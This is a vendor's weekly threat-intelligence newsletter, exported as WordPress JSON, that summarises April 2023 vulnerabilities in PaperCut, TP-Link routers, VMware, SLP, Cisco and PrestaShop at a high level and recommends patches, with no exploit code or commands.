{"id":18003,"date":"2023-04-24T07:44:08","date_gmt":"2023-04-24T14:44:08","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=18003"},"modified":"2023-05-02T15:26:12","modified_gmt":"2023-05-02T22:26:12","slug":"securins-threat-intelligence-apr-24-2023-apr-28-2023","status":"publish","type":"post","link":"https:\/\/10.42.32.162\/articles\/securins-threat-intelligence-apr-24-2023-apr-28-2023\/","title":{"rendered":"Securin’s Threat Intelligence: Apr 24, 2023 – Apr 28, 2023"},"content":{"rendered":"\t\t
This edition brings you early warnings, trending news about cyber threats, and the accurate threat context. Check out which threat group is on the rampage, what vulnerability it could soon weaponize, and more.<\/span><\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t CISA added the following 3 vulnerabilities on April 21, 2023:\u00a0<\/span><\/p> CVE-2023-28432<\/span><\/a> is a MinIO information disclosure vulnerability. The bug exposes payment-related information, first and last name, email address, payment address, payment card expiration date, etc., of subscribers.<\/span><\/p> CVE-2023-27350<\/span><\/a> is a PaperCut MF\/NG improper access control vulnerability. It allows remote attackers to bypass authentication and run arbitrary code.<\/span><\/p> Update<\/b>: A <\/span>proof-of-concept<\/span><\/a> is available for this vulnerability and two threat actor groups (Clop and Lockbit ransomware) are actively exploiting it in attacks with PowerShell commands that install Atera and Syncro remote management software. <\/span><\/p> CVE-2023-2136<\/span><\/a> is a Google Chrome Skia integer overflow vulnerability that allows threat actors to perform a sandbox escape via a crafted HTML page.<\/span><\/p> All federal entities are expected to patch these vulnerabilities by May 12, 2023.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t The CVE-2023-1389<\/a> vulnerability affects the TP-Link Archer AX21 Wi-Fi router. It is an unauthenticated command injection vulnerability in the local API available via the web management interface. This vulnerability was recently added to the arsenal of the Mirai Botnet threat actors, who are already actively exploiting it in the wild. Attackers can exploit this vulnerability by making\u00a0 HTTP requests to the Mirai command and control (C2) servers to download and execute a series of binary payloads after gaining initial access. After this, they can launch Distributed-Denial-of-Service attacks and even imitate legitimate traffic, making it more difficult to separate DDoS traffic from legitimate network traffic.<\/span><\/p> TP-Link has released a patch<\/a> for this CVE, and users are recommended to apply it immediately.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t The following three vulnerabilities affect APC Easy UPS Online Monitoring Software and Schneider Electric Easy UPS Online Monitoring Software.\u00a0<\/span><\/p> Windows 10, 11, and Windows Server 2016, 2019, and 2022 are impacted by these vulnerabilities.<\/span><\/p> Users are recommended to upgrade their software versions<\/a> to patch these vulnerabilities.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t A security vulnerability tracked as CVE-2023-20869<\/a> has been identified in the Bluetooth device-sharing feature. This vulnerability enables local attackers to execute code as the virtual machine’s VMX process running on the host by exploiting a stack-based buffer-overflow issue.<\/span><\/p> An information disclosure vulnerability identified as CVE-2023-20870<\/a> also affects the Bluetooth device-sharing feature. This weakness allows malicious actors to read privileged information from a VM by exploiting the functionality for sharing host Bluetooth devices, which can be found in hypervisor memory.<\/span><\/p> A VMware Fusion Raw Disk vulnerability, tracked as CVE-2023-20871<\/a>, has been identified as a local privilege escalation flaw. This vulnerability can be exploited by attackers with read\/write access to the host operating system, allowing them to escalate privileges and obtain root access to the host OS. It has been categorized as a high-severity vulnerability.<\/span><\/p> CVE-2023-20872<\/a> is an out-of-bounds read\/write vulnerability, affecting both Workstation and Fusion products. The vulnerability lies in the SCSI CD\/DVD device emulation feature. This flaw can be exploited by local attackers with access to VMs configured to use a virtual SCSI controller and have a physical CD\/DVD drive attached. By exploiting this vulnerability, attackers can gain code execution on the hypervisor from the VM. VMware has a <\/span>temporary workaround<\/span><\/a> for this.<\/span><\/p> VMware has addressed all these vulnerabilities in a security advisory<\/a>.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t CVE-2023-29552<\/a> is a vulnerability in the Service Location Protocol (SLP), an old internet protocol, that affects devices used by over 2,000 organizations. The flaw exposes around 54,000 exploitable SLP instances, which the attackers can leverage to launch reflective DoS amplification attacks on targets. The exploitation of CVE-2023-29552 can lead to an increase in the UDP response size of a server. This can be achieved by registering new services until the response buffer reaches its limit.<\/span><\/p> In order to safeguard your company’s resources against potential misuse, it is recommended that SLP be turned off on systems that are accessible via the internet or untrusted networks. VMware has released a <\/strong><\/span>bulletin<\/a> addressing this issue, indicating that it only affects outdated ESXi versions that are no longer supported and recommending that administrators avoid exposing them to untrusted networks.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t CVE-2023-20060 is a vulnerability found in the web-based management interface of Cisco PCD 14. It can allow unauthenticated attackers to launch cross-site scripting attacks remotely. However, the exploitation requires user interaction.<\/span><\/p> CISCO patched<\/a> this vulnerability and urged users to apply it and also not click any suspicious link.<\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t PrestaShop <\/span>addressed<\/span><\/a> a few vulnerabilities that impact its software. They are:<\/span><\/p> CVE-2023-30839<\/span><\/a> is a critical vulnerability that allows users to perform unauthorized modifications on the online store\u2019s database. An attacker can exploit this vulnerability to cause significant damage or even service outage to an impacted business. It can also allow injection of malicious code, backdoors and access to the SQL database.<\/span><\/p>Why play catch up when you can fix your gaps now?<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Trending Threats<\/h3>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Vulnerabilities to Watch Out For<\/h3>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Trending Threats<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
CISA Adds More Vulnerabilities to the KEV Catalog\n<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Vulnerabilities to Watch Out For<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
CVE-2023-1389: TP-LINK WAN-Side Vulnerability <\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Multiple Vulnerabilities in UPS Software<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
VMware\u2019s Zero-Day Vulnerabilities<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
CVE-2023-29552: SLP\u2019s DDoS Bug<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
CVE-2023-20060: Cisco XSS Zero-Day Flaw<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t
Vulnerabilities in PrestaShop<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t